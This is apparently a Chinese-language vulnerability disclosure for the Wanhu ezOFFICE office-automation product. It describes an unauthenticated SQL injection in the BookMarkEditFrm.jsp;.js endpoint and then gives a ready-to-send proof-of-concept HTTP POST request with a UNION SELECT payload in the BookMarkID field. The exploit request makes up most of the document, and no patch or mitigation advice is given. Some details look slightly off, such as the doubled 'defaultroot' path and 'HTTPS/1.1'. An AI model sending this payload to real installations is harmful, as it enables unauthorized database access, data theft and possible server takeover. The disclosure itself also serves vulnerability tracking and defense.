漏洞描述
万户OA ezoffice 是万户网络推出的一款中高端市场的 OA 协同办公软件产品,提供统一的基础管理平台,实现用户数据统一管理、权限分配和身份认证。该漏洞存在于 /defaultroot/public/iWebOfficeSign/BookMark/BookMarkEditFrm.jsp;.js 接口中,未授权的攻击者可以通过 SQL 注入获取数据库权限,进一步利用可能获取服务器权限,导致敏感信息泄露和系统被完全控制。
万户 ezOFFICE /defaultroot/public/iWebOfficeSign/BookMark/BookMarkEditFrm.jsp;.js SQL 注入漏洞
PoC代码
POST /defaultroot/defaultroot/public/iWebOfficeSign/BookMark/BookMarkEditFrm.jsp;.js HTTPS/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Length: 140
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
BookMarkID=-42734+UNION+ALL+SELECT+NULL%2CNULL%2Cconcat%280x7e%2C%28select+42734*42734%29%2C0x7e%29%2CNULL%2CNULL%2CNULL--+aqlc&moduleType=1